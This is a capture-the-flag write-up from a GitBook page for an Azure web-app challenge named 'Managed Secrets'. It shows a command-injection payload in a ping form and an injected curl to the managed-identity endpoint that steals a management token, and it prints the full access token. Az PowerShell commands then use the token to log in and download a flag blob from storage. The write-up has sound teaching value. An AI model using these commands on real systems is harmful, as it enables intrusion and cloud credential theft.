Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. Authored
  2. Lag and Crash 2023

Managed Secrets

PreviousLag and Crash 2023NextPickle Rick

Last updated 3 months ago

Was this helpful?

Difficulty
Points
Solves

Medium

500

3

Description

Today in school, I learnt how to create a website with python! There is also the networking lesson where i learn the ping command...

ps the flag is not in the instance :)

Hints: Are there any internal services/endpoint running by default?

Visiting the sites show an Azure Web App Service running

What the web app does is to send a ping to whatever IP Address or URL you define it to. This is a very classical command injection sample challenge, and we are able to easily get code execution

8.8.8.8 & whoami

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token refering to hacktricks.

8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw","expires_on":"04/16/2023 22:34:06 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"982d1ca9-81ee-450e-8953-0f1a27129eb2"}

I am able to authenticate using the access token and client id value

$token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw"
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

Connect-AzAccount -AccessToken $token -AccountId $id

Next, I enumerate the resource that this service principal has access to.

I am then able to retrieve the flag from the storage account.

$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}

https://lncctf2023-webapp.azurewebsites.net
LogoWeb App Service | Microsoft Azure
LogoCloud SSRFHackTricks